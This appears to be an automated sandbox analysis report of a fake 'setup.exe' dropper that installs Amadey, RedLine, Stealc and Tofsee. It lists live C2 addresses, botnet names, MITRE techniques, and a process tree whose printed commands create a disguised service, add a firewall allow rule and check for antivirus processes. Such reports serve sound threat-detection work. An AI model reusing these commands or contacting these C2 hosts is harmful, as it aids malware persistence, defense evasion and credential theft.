amadey | 0bfeb9c0d367f6caf4a1dd78b9855a3074930d1197012fbb3ca546b77200e108

Resubmissions

05-07-2024 16:45

240705-t9gyys1hrn 10

05-07-2024 16:32

240705-t2a6fa1gnn 10

Analysis

max time kernel
109s
max time network
162s
platform
windows11-21h2_x64
resource
win11-20240704-en
resource tags

arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system
submitted
05-07-2024 16:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup.exe
Size

794.4MB
MD5

6d95cb153d6806c9f408fa1d17253001
SHA1

38371c4df014bf03ea0430392202b78319f4b09f
SHA256

a04defc1f6811ebb64907ad79c63c2ccedb2cba15afca05758f537768da7b934
SHA512

0ab1800b639709648e82c9370e727999de9b5564107cd41b2d0ff5bbbb6f324a854ef5a5269cd8c3f3ac96c669014b9eac398c8902e47d779027b6726aec95d2
SSDEEP

98304:dmg6rK+6/Murdncf8kJPBesTcbMl3sjWpoDELiDKzyeByA:doYMKaP5eqcbM5sOLiDheB

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

77.105.135.107:3445

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffoc

4.185.56.82:42687

Extracted

Family

redline

Botnet

newlogs

85.28.47.7:17210

Extracted

Family

stealc

Botnet

ZOV

http://40.86.87.10

Attributes

url_path
/108e010e8f91c38c.php

Extracted

Family

redline

Botnet

newbuild

185.215.113.67:40960

Extracted

Family

stealc

Botnet

Nice

http://85.28.47.30

Attributes

url_path
/920475a59bac849d.php

Extracted

Family

amadey

Version

4.30

Botnet

4dd39d

http://77.91.77.82

Attributes

install_dir
ad40971b6b
install_file
explorti.exe
strings_key
a434973ad22def7137dbb5e059b7081e
url_paths
/Hun4Ko/index.php

rc4.plain

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

185.172.128.33:8970

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 8 IoCs

resource	yara_rule
behavioral16/memory/4108-312-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral16/memory/2896-1053-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral16/files/0x000100000002ab79-1059.dat	family_redline
behavioral16/memory/2256-1074-0x0000000000E90000-0x0000000000EE0000-memory.dmp	family_redline
behavioral16/files/0x000100000002ab89-1143.dat	family_redline
behavioral16/memory/2740-1166-0x00000000007B0000-0x0000000000800000-memory.dmp	family_redline
behavioral16/memory/2012-1313-0x0000000000050000-0x00000000000A2000-memory.dmp	family_redline
behavioral16/files/0x000200000002aba8-1307.dat	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3T0Na7NeLY9KSLKB1S5MzKeX.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1176	powershell.exe
3844	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2392	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3T0Na7NeLY9KSLKB1S5MzKeX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3T0Na7NeLY9KSLKB1S5MzKeX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe

Executes dropped EXE 22 IoCs

pid	Process
3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe
4268	KCx7eBObp2OYRk87KXCb_fWw.exe
3560	2jZ1YzRyDrp3DMv46_rEZcop.exe
588	YDM10Kv2tWWnslglzfKuqC3_.exe
3792	O7KLGfySKnwRB1gw8LUzTPNv.exe
2572	3T0Na7NeLY9KSLKB1S5MzKeX.exe
3536	sERjXfHueAS8ehkm4SYW_I1w.exe
764	DEZCEGAbwf5CapWebIrDjz3j.exe
4948	6nHwEM9LPdfXeMjcLj0sF9Vg.exe
4860	yGrIl__IkGJ1gKckfHLtlnal.exe
3340	XOenkRQWGcYuj11PpY3xnsxM.exe
3112	nu4h36FFh40oIiRbiejGkqCz.exe
3428	O7KLGfySKnwRB1gw8LUzTPNv.tmp
3936	gectorradio32_64.exe
3652	gectorradio32_64.exe
3168	Install.exe
2936	Install.exe
4420	Install.exe
2112	Install.exe
3640	axplong.exe
3488	Spec.pif
3548	2VaeY0gFivcCXCsHFUqxArRX.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1945933150-1754111531-3454729080-1000\Software\Wine	3T0Na7NeLY9KSLKB1S5MzKeX.exe
Key opened	\REGISTRY\USER\S-1-5-21-1945933150-1754111531-3454729080-1000\Software\Wine	axplong.exe

Loads dropped DLL 1 IoCs

pid	Process
3428	O7KLGfySKnwRB1gw8LUzTPNv.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
22	iplogger.org
59	iplogger.org
179	raw.githubusercontent.com
180	raw.githubusercontent.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ipinfo.io
138	ip-api.com
2	api.myip.com
3	api.myip.com
6	ipinfo.io

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3328	powercfg.exe
1920	powercfg.exe
556	powercfg.exe
3000	powercfg.exe
1824	powercfg.exe
3940	powercfg.exe
3384	powercfg.exe
3112	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
6124	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2572	3T0Na7NeLY9KSLKB1S5MzKeX.exe
3112	nu4h36FFh40oIiRbiejGkqCz.exe
3112	nu4h36FFh40oIiRbiejGkqCz.exe
3640	axplong.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3536 set thread context of 4108	3536	sERjXfHueAS8ehkm4SYW_I1w.exe	95
PID 3560 set thread context of 2124	3560	2jZ1YzRyDrp3DMv46_rEZcop.exe	98
PID 3124 set thread context of 3928	3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe	103

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplong.job	3T0Na7NeLY9KSLKB1S5MzKeX.exe

Launches sc.exe 7 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2704	sc.exe
4820	sc.exe
1600	sc.exe
3332	sc.exe
2104	sc.exe
4232	sc.exe
2036	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
3472	3560	WerFault.exe	85
1644	3536	WerFault.exe	90
2584	4268	WerFault.exe	84
644	2996	WerFault.exe	146
4464	2700	WerFault.exe	126
4568	1472	WerFault.exe	180
3420	4652	WerFault.exe	204
5844	5612	WerFault.exe	236

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	nu4h36FFh40oIiRbiejGkqCz.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	nu4h36FFh40oIiRbiejGkqCz.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
1488	timeout.exe
948	timeout.exe
5376	timeout.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery

T1057

pid	Process
668	tasklist.exe
4528	tasklist.exe
5984	tasklist.exe
3324	tasklist.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5568	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5648	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1492	schtasks.exe
2184	schtasks.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1192	setup.exe
1192	setup.exe
2572	3T0Na7NeLY9KSLKB1S5MzKeX.exe
2572	3T0Na7NeLY9KSLKB1S5MzKeX.exe
3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe
3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe
3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe
3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe
3112	nu4h36FFh40oIiRbiejGkqCz.exe
3112	nu4h36FFh40oIiRbiejGkqCz.exe
4948	6nHwEM9LPdfXeMjcLj0sF9Vg.exe
4948	6nHwEM9LPdfXeMjcLj0sF9Vg.exe
3640	axplong.exe
3640	axplong.exe
3928	MSBuild.exe
3928	MSBuild.exe
3488	Spec.pif
3488	Spec.pif

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe
Token: SeDebugPrivilege	2124	RegAsm.exe
Token: SeBackupPrivilege	2124	RegAsm.exe
Token: SeSecurityPrivilege	2124	RegAsm.exe
Token: SeSecurityPrivilege	2124	RegAsm.exe
Token: SeSecurityPrivilege	2124	RegAsm.exe
Token: SeSecurityPrivilege	2124	RegAsm.exe
Token: SeDebugPrivilege	668	tasklist.exe
Token: SeDebugPrivilege	4528	tasklist.exe
Token: SeDebugPrivilege	3548	2VaeY0gFivcCXCsHFUqxArRX.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
3428	O7KLGfySKnwRB1gw8LUzTPNv.tmp
2572	3T0Na7NeLY9KSLKB1S5MzKeX.exe
3488	Spec.pif
3488	Spec.pif
3488	Spec.pif

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3488	Spec.pif
3488	Spec.pif
3488	Spec.pif

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3112	nu4h36FFh40oIiRbiejGkqCz.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1192 wrote to memory of 3124	1192	setup.exe	82
PID 1192 wrote to memory of 3124	1192	setup.exe	82
PID 1192 wrote to memory of 3124	1192	setup.exe	82
PID 1192 wrote to memory of 4268	1192	setup.exe	84
PID 1192 wrote to memory of 4268	1192	setup.exe	84
PID 1192 wrote to memory of 4268	1192	setup.exe	84
PID 1192 wrote to memory of 3560	1192	setup.exe	138
PID 1192 wrote to memory of 3560	1192	setup.exe	138
PID 1192 wrote to memory of 3560	1192	setup.exe	138
PID 1192 wrote to memory of 588	1192	setup.exe	86
PID 1192 wrote to memory of 588	1192	setup.exe	86
PID 1192 wrote to memory of 588	1192	setup.exe	86
PID 1192 wrote to memory of 3792	1192	setup.exe	83
PID 1192 wrote to memory of 3792	1192	setup.exe	83
PID 1192 wrote to memory of 3792	1192	setup.exe	83
PID 1192 wrote to memory of 2572	1192	setup.exe	87
PID 1192 wrote to memory of 2572	1192	setup.exe	87
PID 1192 wrote to memory of 2572	1192	setup.exe	87
PID 1192 wrote to memory of 3112	1192	setup.exe	208
PID 1192 wrote to memory of 3112	1192	setup.exe	208
PID 1192 wrote to memory of 3112	1192	setup.exe	208
PID 1192 wrote to memory of 3536	1192	setup.exe	90
PID 1192 wrote to memory of 3536	1192	setup.exe	90
PID 1192 wrote to memory of 3536	1192	setup.exe	90
PID 1192 wrote to memory of 764	1192	setup.exe	89
PID 1192 wrote to memory of 764	1192	setup.exe	89
PID 1192 wrote to memory of 4948	1192	setup.exe	91
PID 1192 wrote to memory of 4948	1192	setup.exe	91
PID 1192 wrote to memory of 4860	1192	setup.exe	92
PID 1192 wrote to memory of 4860	1192	setup.exe	92
PID 1192 wrote to memory of 4860	1192	setup.exe	92
PID 1192 wrote to memory of 3340	1192	setup.exe	93
PID 1192 wrote to memory of 3340	1192	setup.exe	93
PID 1192 wrote to memory of 3340	1192	setup.exe	93
PID 3792 wrote to memory of 3428	3792	O7KLGfySKnwRB1gw8LUzTPNv.exe	94
PID 3792 wrote to memory of 3428	3792	O7KLGfySKnwRB1gw8LUzTPNv.exe	94
PID 3792 wrote to memory of 3428	3792	O7KLGfySKnwRB1gw8LUzTPNv.exe	94
PID 3536 wrote to memory of 4108	3536	sERjXfHueAS8ehkm4SYW_I1w.exe	95
PID 3536 wrote to memory of 4108	3536	sERjXfHueAS8ehkm4SYW_I1w.exe	95
PID 3536 wrote to memory of 4108	3536	sERjXfHueAS8ehkm4SYW_I1w.exe	95
PID 3428 wrote to memory of 3936	3428	O7KLGfySKnwRB1gw8LUzTPNv.tmp	96
PID 3428 wrote to memory of 3936	3428	O7KLGfySKnwRB1gw8LUzTPNv.tmp	96
PID 3428 wrote to memory of 3936	3428	O7KLGfySKnwRB1gw8LUzTPNv.tmp	96
PID 3536 wrote to memory of 4108	3536	sERjXfHueAS8ehkm4SYW_I1w.exe	95
PID 3536 wrote to memory of 4108	3536	sERjXfHueAS8ehkm4SYW_I1w.exe	95
PID 3536 wrote to memory of 4108	3536	sERjXfHueAS8ehkm4SYW_I1w.exe	95
PID 3536 wrote to memory of 4108	3536	sERjXfHueAS8ehkm4SYW_I1w.exe	95
PID 3536 wrote to memory of 4108	3536	sERjXfHueAS8ehkm4SYW_I1w.exe	95
PID 3560 wrote to memory of 2124	3560	2jZ1YzRyDrp3DMv46_rEZcop.exe	98
PID 3560 wrote to memory of 2124	3560	2jZ1YzRyDrp3DMv46_rEZcop.exe	98
PID 3560 wrote to memory of 2124	3560	2jZ1YzRyDrp3DMv46_rEZcop.exe	98
PID 3124 wrote to memory of 4748	3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe	221
PID 3124 wrote to memory of 4748	3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe	221
PID 3124 wrote to memory of 4748	3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe	221
PID 3428 wrote to memory of 3652	3428	O7KLGfySKnwRB1gw8LUzTPNv.tmp	100
PID 3428 wrote to memory of 3652	3428	O7KLGfySKnwRB1gw8LUzTPNv.tmp	100
PID 3428 wrote to memory of 3652	3428	O7KLGfySKnwRB1gw8LUzTPNv.tmp	100
PID 3560 wrote to memory of 2124	3560	2jZ1YzRyDrp3DMv46_rEZcop.exe	98
PID 3560 wrote to memory of 2124	3560	2jZ1YzRyDrp3DMv46_rEZcop.exe	98
PID 3560 wrote to memory of 2124	3560	2jZ1YzRyDrp3DMv46_rEZcop.exe	98
PID 3560 wrote to memory of 2124	3560	2jZ1YzRyDrp3DMv46_rEZcop.exe	98
PID 3560 wrote to memory of 2124	3560	2jZ1YzRyDrp3DMv46_rEZcop.exe	98
PID 3124 wrote to memory of 4060	3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe	102
PID 3124 wrote to memory of 4060	3124	IJycniQLMISeLyGCJ1Q6Nwbl.exe	102

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5300	attrib.exe

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Modifies firewall policy service
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Users\Admin\Documents\SimpleAdobe\IJycniQLMISeLyGCJ1Q6Nwbl.exe
  C:\Users\Admin\Documents\SimpleAdobe\IJycniQLMISeLyGCJ1Q6Nwbl.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3124
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4748
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4060
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3928
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKFBAECBAEGD" & exit
      4⤵
      PID:1232
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:948
- C:\Users\Admin\Documents\SimpleAdobe\O7KLGfySKnwRB1gw8LUzTPNv.exe
  C:\Users\Admin\Documents\SimpleAdobe\O7KLGfySKnwRB1gw8LUzTPNv.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3792
- - C:\Users\Admin\AppData\Local\Temp\is-R3BFH.tmp\O7KLGfySKnwRB1gw8LUzTPNv.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-R3BFH.tmp\O7KLGfySKnwRB1gw8LUzTPNv.tmp" /SL5="$6028E,4889829,54272,C:\Users\Admin\Documents\SimpleAdobe\O7KLGfySKnwRB1gw8LUzTPNv.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:3428
  - - C:\Users\Admin\AppData\Local\Gector Radio\gectorradio32_64.exe
      "C:\Users\Admin\AppData\Local\Gector Radio\gectorradio32_64.exe" -i
      4⤵
      Executes dropped EXE
      PID:3936
  - - C:\Users\Admin\AppData\Local\Gector Radio\gectorradio32_64.exe
      "C:\Users\Admin\AppData\Local\Gector Radio\gectorradio32_64.exe" -s
      4⤵
      Executes dropped EXE
      PID:3652
- C:\Users\Admin\Documents\SimpleAdobe\KCx7eBObp2OYRk87KXCb_fWw.exe
  C:\Users\Admin\Documents\SimpleAdobe\KCx7eBObp2OYRk87KXCb_fWw.exe
  2⤵
  - Executes dropped EXE
  PID:4268
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\cbadwdrv\
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\kawlgywe.exe" C:\Windows\SysWOW64\cbadwdrv\
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" create cbadwdrv binPath= "C:\Windows\SysWOW64\cbadwdrv\kawlgywe.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\KCx7eBObp2OYRk87KXCb_fWw.exe\"" type= own start= auto DisplayName= "wifi support"
    3⤵
    - Launches sc.exe
    PID:4232
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" description cbadwdrv "wifi internet conection"
    3⤵
    - Launches sc.exe
    PID:2036
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" start cbadwdrv
    3⤵
    - Launches sc.exe
    PID:2704
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
    3⤵
    - Modifies Windows Firewall
    PID:2392
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 692
    3⤵
    - Program crash
    PID:2584
- C:\Users\Admin\Documents\SimpleAdobe\2jZ1YzRyDrp3DMv46_rEZcop.exe
  C:\Users\Admin\Documents\SimpleAdobe\2jZ1YzRyDrp3DMv46_rEZcop.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3560
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2124
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 320
    3⤵
    - Program crash
    PID:3472
- C:\Users\Admin\Documents\SimpleAdobe\YDM10Kv2tWWnslglzfKuqC3_.exe
  C:\Users\Admin\Documents\SimpleAdobe\YDM10Kv2tWWnslglzfKuqC3_.exe
  2⤵
  - Executes dropped EXE
  PID:588
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k copy Urban Urban.cmd & Urban.cmd & exit
    3⤵
    PID:1472
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:668
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:4748
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4528
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:1624
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 780229
      4⤵
      PID:2700
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "STEADYSIMSCOLLABORATIVEHUMANITIES" Stylus
      4⤵
      PID:1920
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Conservative + Transmission + Employee + Conservation + Coastal + Atlanta 780229\p
      4⤵
      PID:2636
  - - C:\Users\Admin\AppData\Local\Temp\780229\Spec.pif
      780229\Spec.pif 780229\p
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:3488
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:1488
- C:\Users\Admin\Documents\SimpleAdobe\3T0Na7NeLY9KSLKB1S5MzKeX.exe
  C:\Users\Admin\Documents\SimpleAdobe\3T0Na7NeLY9KSLKB1S5MzKeX.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  PID:2572
- - C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
    "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:3640
  - - C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe
      "C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe"
      4⤵
      PID:2996
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:3384
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:2896
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 324
        5⤵
        Program crash
        
        PID:644
  - - C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe
      "C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe"
      4⤵
      PID:2256
  - - C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe
      "C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe"
      4⤵
      PID:644
  - - C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe
      "C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe"
      4⤵
      PID:2740
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub
        5⤵
        
        PID:4748
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcafd63cb8,0x7ffcafd63cc8,0x7ffcafd63cd8
        6⤵
        
        PID:476
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,12210430892104414968,10883891373041401253,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1992 /prefetch:2
        6⤵
        
        PID:3500
